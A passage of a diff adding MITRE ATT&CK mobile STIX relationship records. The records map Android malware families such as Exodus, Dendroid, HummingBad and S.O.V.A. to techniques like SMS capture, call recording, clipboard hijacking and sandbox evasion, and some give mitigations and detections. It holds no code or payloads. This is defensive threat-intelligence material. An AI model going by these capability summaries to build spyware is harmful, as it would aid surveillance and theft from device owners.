], + "modified": "2023-04-05T20:49:16.886Z", + "description": "[Android/AdDisplay.Ashas](https://attack.mitre.org/software/S0525) can check that the device IP is not in the range of known Google IP addresses before triggering the payload and can delay payload deployment to avoid detection during testing and avoid association with unwanted ads.(Citation: WeLiveSecurity AdDisplayAshas)", + "relationship_type": "uses", + "source_ref": "malware--f7e7b736-2cff-4c2a-9232-352cd383463a", + "target_ref": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--373f33be-9b40-44f5-bfd3-db2a9f5fa72c", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "HackerNews-OldBoot", + "description": "Sudhir K Bansal. (2014, January 28). First widely distributed Android bootkit Malware infects more than 350,000 Devices. Retrieved December 21, 2016.", + "url": "http://thehackernews.com/2014/01/first-widely-distributed-android.html" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[OldBoot](https://attack.mitre.org/software/S0285) uses escalated privileges to modify the init script on the device's boot partition to maintain persistence.(Citation: HackerNews-OldBoot)", + "relationship_type": "uses", + "source_ref": "malware--2074b2ad-612e-4758-adce-7901c1b49bbc", + "target_ref": "attack-pattern--46d818a5-67fa-4585-a7fc-ecf15376c8d5", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a1c53fcf-a691-4233-a136-0a51d5a3840f", + "created": "2019-09-03T19:45:48.518Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019.", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:11:03.802Z", + "description": "[Exodus](https://attack.mitre.org/software/S0405) Two can capture SMS messages.(Citation: SWB Exodus March 2019)", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--38cb6365-40ba-47c6-a5e4-1a9be665f951", + "created": "2023-01-19T18:08:14.716Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "trendmicro_tianyspy_0122", + "description": "Trend Micro. (2022, January 25). TianySpy Malware Uses Smishing Disguised as Message From Telco. Retrieved January 11, 2023.", + "url": "https://www.trendmicro.com/en_us/research/22/a/tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-01T16:50:04.964Z", + "description": "[TianySpy](https://attack.mitre.org/software/S1056) has encrypted C2 details, email addresses, and passwords.(Citation: trendmicro_tianyspy_0122) ", + "relationship_type": "uses", + "source_ref": "malware--fd6d56b2-d84e-4d2a-b37d-d4678d3e08a6", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--c021d9b9-3850-425d-b3d2-6b7bd7e62b95", + "type": "relationship", + "created": "2019-10-18T15:51:48.525Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2019-10-18T15:51:48.525Z", + "description": "Users should be advised not to use public charging stations or computers to charge their devices. Instead, users should be issued a charger acquired from a trustworthy source. Users should be advised not to click on device prompts to trust attached computers unless absolutely necessary.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--667e5707-3843-4da8-bd34-88b922526f0d", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6920d0d0-27f4-4d29-8622-c8a92090eec3", + "created": "2020-07-20T13:27:33.486Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Talos-WolfRAT", + "description": "W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . Retrieved July 20, 2020.", + "url": "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:54:25.851Z", + "description": "[WolfRAT](https://attack.mitre.org/software/S0489) can collect the device’s contact list.(Citation: Talos-WolfRAT)", + "relationship_type": "uses", + "source_ref": "malware--dfdac962-9461-47f0-a212-36dfce2a97e6", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--bbe1af69-7303-4205-82d8-5b03c43e39c1", + "type": "relationship", + "created": "2020-11-24T17:55:12.887Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos GPlayed", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020." + } + ], + "modified": "2020-11-24T17:55:12.887Z", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) can collect the device’s model, country, and Android version.(Citation: Talos GPlayed)", + "relationship_type": "uses", + "source_ref": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3f5dbd48-5899-4e97-96a6-ad7e68b673cd", + "created": "2023-03-20T18:43:03.117Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:43:03.117Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--0cdd66ad-26ac-4338-a764-4972a1e17ee3", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e928c0ce-2b98-4af5-a990-f690f4306681", + "created": "2023-03-20T18:43:46.070Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:43:46.070Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--d446b9f0-06a9-4a8d-97ee-298cfee84f14", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--6cace9e3-f095-4914-bddc-24cec8bcc859", + "type": "relationship", + "created": "2020-09-24T15:34:51.276Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-Dendroid", + "description": "Marc Rogers. (2014, March 6). Dendroid malware can take over your camera, record audio, and sneak into Google Play. Retrieved December 22, 2016.", + "url": "https://blog.lookout.com/blog/2014/03/06/dendroid/" + } + ], + "modified": "2020-09-24T15:34:51.276Z", + "description": "[Dendroid](https://attack.mitre.org/software/S0301) can collect the device’s photos, browser history, bookmarks, and accounts stored on the device.(Citation: Lookout-Dendroid)", + "relationship_type": "uses", + "source_ref": "malware--317a2c10-d489-431e-b6b2-f0251fddc88e", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--54ce9375-cc0f-456e-ac22-e6fe822a6cec", + "created": "2022-04-01T15:54:48.924Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Applications very rarely require administrator permission. Developers should be cautioned against using this higher degree of access to avoid being flagged as a potentially malicious application. ", + "modified": "2022-04-01T15:54:48.924Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--25dc1ce8-eb55-4333-ae30-a7cb4f5894a1", + "target_ref": "attack-pattern--08ea902d-ecb5-47ed-a453-2798057bb2d3", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--2be3d0a4-2e24-4d04-859e-37d24835ff16", + "type": "relationship", + "created": "2021-02-17T20:43:52.420Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout FrozenCell", + "url": "https://blog.lookout.com/frozencell-mobile-threat", + "description": "Michael Flossman. (2017, October 5). FrozenCell: Multi-platform surveillance campaign against Palestinians. Retrieved November 11, 2020." + } + ], + "modified": "2021-02-17T20:43:52.420Z", + "description": "[FrozenCell](https://attack.mitre.org/software/S0577) has retrieved device images for exfiltration.(Citation: Lookout FrozenCell)", + "relationship_type": "uses", + "source_ref": "malware--96ea1e13-d50f-45f1-b0cf-4ac9bc5a2d62", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--c659256c-82e3-4f4c-ac70-3d2400cf6695", + "type": "relationship", + "created": "2020-09-11T16:23:16.363Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Desert Scorpion", + "url": "https://blog.lookout.com/desert-scorpion-google-play", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-11T16:23:16.363Z", + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) can send SMS messages.(Citation: Lookout Desert Scorpion)", + "relationship_type": "uses", + "source_ref": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--8650e2e8-d8bd-472d-8b9b-54befbea05b8", + "created": "2022-04-05T19:49:59.027Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-05T19:49:59.027Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--0f4fb01b-d57a-4375-b7a2-342c9d3248f7", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--634071ce-d386-4143-8e6e-b88bc077de6d", + "type": "relationship", + "created": "2020-07-27T14:14:56.961Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Google Security Zen", + "url": "https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html", + "description": "Siewierski, L. (2019, January 11). PHA Family Highlights: Zen and its cousins . Retrieved July 27, 2020." + } + ], + "modified": "2020-08-10T22:18:20.782Z", + "description": "[Zen](https://attack.mitre.org/software/S0494) can dynamically load executable code from remote sources.(Citation: Google Security Zen)", + "relationship_type": "uses", + "source_ref": "malware--22faaa56-a8ac-4292-9be6-b571b255ee40", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--c368c932-7d5a-40e3-a18b-f30e82b9e4e6", + "type": "relationship", + "created": "2020-10-29T17:48:27.332Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Threat Fabric Exobot", + "url": "https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html", + "description": "Threat Fabric. (2017, February). Exobot - Android banking Trojan on the rise. Retrieved October 29, 2020." + } + ], + "modified": "2020-10-29T17:48:27.332Z", + "description": "[Exobot](https://attack.mitre.org/software/S0522) can obtain the device’s IMEI, phone number, and IP address.(Citation: Threat Fabric Exobot) ", + "relationship_type": "uses", + "source_ref": "malware--c91cec55-634c-4670-ba10-2dc7ceb28e98", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a427ce33-d1e1-4c38-a024-e44fc00033d3", + "created": "2020-12-14T14:52:03.283Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Sophos Red Alert 2.0", + "url": "https://news.sophos.com/en-us/2018/07/23/red-alert-2-0-android-trojan-targets-security-seekers/", + "description": "J. Chandraiah. (2018, July 23). Red Alert 2.0: Android Trojan targets security-seekers. Retrieved December 14, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Red Alert 2.0](https://attack.mitre.org/software/S0539) has communicated with the C2 using HTTP requests over port 7878.(Citation: Sophos Red Alert 2.0)", + "modified": "2022-04-20T16:43:23.973Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--6e282bbf-5f32-476a-b879-ba77eec463c8", + "target_ref": "attack-pattern--948a447c-d783-4ba0-8516-a64140fcacd5", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--f632b0bb-69ce-4678-bc3c-9ddff5a38794", + "type": "relationship", + "created": "2019-11-21T16:42:48.488Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "GReAT. (2019, June 26). ViceLeaker Operation: mobile espionage targeting Middle East. Retrieved November 21, 2019.", + "url": "https://securelist.com/fanning-the-flames-viceleaker-operation/90877/", + "source_name": "SecureList - ViceLeaker 2019" + }, + { + "source_name": "Bitdefender - Triout 2018", + "url": "https://labs.bitdefender.com/2018/08/triout-spyware-framework-for-android-with-extensive-surveillance-capabilities/", + "description": "L. Arsene, C. Ochinca. (2018, August 20). Triout – Spyware Framework for Android with Extensive Surveillance Capabilities. Retrieved January 21, 2020." + } + ], + "modified": "2020-01-21T14:20:50.474Z", + "description": "[ViceLeaker](https://attack.mitre.org/software/S0418) can record audio from the device’s microphone and can record phone calls together with the caller ID.(Citation: SecureList - ViceLeaker 2019)(Citation: Bitdefender - Triout 2018)", + "relationship_type": "uses", + "source_ref": "malware--6fcaf9b0-b509-4644-9f93-556222c81ed2", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d87b468e-f610-4e95-8dfb-8cf029f0e891", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "ArsTechnica-HummingBad", + "description": "Dan Goodin. (2016, July 7). 10 million Android phones infected by all-powerful auto-rooting apps. Retrieved January 24, 2017.", + "url": "http://arstechnica.com/security/2016/07/virulent-auto-rooting-malware-takes-control-of-10-million-android-devices/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[HummingBad](https://attack.mitre.org/software/S0322) can exploit unfixed vulnerabilities in older Android versions to root victim phones.(Citation: ArsTechnica-HummingBad)", + "relationship_type": "uses", + "source_ref": "malware--c8770c81-c29f-40d2-a140-38544206b2b4", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7965128c-89d6-411e-b765-c60e0cae96c6", + "created": "2023-02-06T19:40:36.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "threatfabric_sova_0921", + "description": "ThreatFabric. (2021, September 9). S.O.V.A. - A new Android Banking trojan with fowl intentions. Retrieved February 6, 2023.", + "url": "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-29T21:36:23.084Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) can manipulate clipboard data to replace cryptocurrency addresses.(Citation: threatfabric_sova_0921)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--74e6003f-c7f4-4047-983b-708cc19b96b6", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2cb834dd-d7cf-46f3-a19b-bdbfb5bfee07", + "created": "2023-03-20T18:54:25.458Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:54:25.458Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4", + "target_ref": "attack-pattern--648f8051-1a35-46d3-b1d8-3a3f5cf2cc8e", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d7d78682-c9ad-4880-ae6e-3fc79f3737f1", + "created": "2019-09-04T15:38:56.809Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CyberMerchants-FlexiSpy", + "description": "Actis B. (2017, April 22). FlexSpy Application Analysis. Retrieved September 4, 2019.", + "url": "http://www.cybermerchantsofdeath.com/blog/2017/04/22/FlexiSpy.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:37:35.704Z", + "description": "[FlexiSpy](https://attack.mitre.org/software/S0408) can delete data from a compromised device.(Citation: CyberMerchants-FlexiSpy)", + "relationship_type": "uses", + "source_ref": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "target_ref": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d54d3475-19ee-4ac5-98b0-ec1ae9336dfb", + "created": "2023-03-20T18:58:14.140Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:58:14.140Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--e422b6fa-4739-46b9-992e-82f1b350c780", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--1ed5b4fa-b871-4efa-87ee-1c91dcaa421e", + "type": "relationship", + "created": "2019-09-03T19:45:48.496Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019." + } + ], + "modified": "2019-10-14T16:47:53.226Z", + "description": "[Exodus](https://attack.mitre.org/software/S0405) Two extracts information from Facebook, Facebook Messenger, Gmail, IMO, Skype, Telegram, Viber, WhatsApp, and WeChat.(Citation: SWB Exodus March 2019)", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7657a4d4-1ba3-4b66-83f7-6db5eab14847", + "created": "2022-04-06T13:30:03.526Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should be taught that Device Administrator permissions are very dangerous, and very few applications need it.", + "modified": "2022-04-06T13:30:03.527Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--e2c2249a-eb82-4614-8dd4-9c514dde65e2", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a011bcc6-b5d8-4923-b533-55abec69ff2f", + "created": "2022-03-30T20:07:33.291Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T20:07:33.291Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--fd658820-cbba-4c95-8ac9-0fac6b1099e2", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e012da15-7669-4764-ad9d-8a1d817bcca9", + "created": "2023-03-20T18:23:04.068Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:23:04.068Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--2f8b5252-551c-4a0d-8e72-8da4050757f3", + "type": "relationship", + "created": "2021-04-19T14:29:46.530Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2021-04-19T14:29:46.530Z", + "description": " [SilkBean](https://attack.mitre.org/software/S0549) can send SMS messages.(Citation: Lookout Uyghur Campaign) ", + "relationship_type": "uses", + "source_ref": "malware--ddbe5657-e21e-4a89-8221-2f1362d397ec", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fcc42341-ec3a-4e24-a374-46bed72d061f", + "type": "relationship", + "created": "2021-10-01T14:42:49.191Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/", + "description": "Alexey Firsh. (2018, August 29). BusyGasper – the unfriendly spy. Retrieved October 1, 2021." + } + ], + "modified": "2021-10-01T14:42:49.191Z", + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can collect data from messaging applications, including WhatsApp, Viber, and Facebook.(Citation: SecureList BusyGasper)", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0d82a9ed-4184-4f95-99f4-5ee467fe6594", + "created": "2022-04-05T17:14:08.267Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + 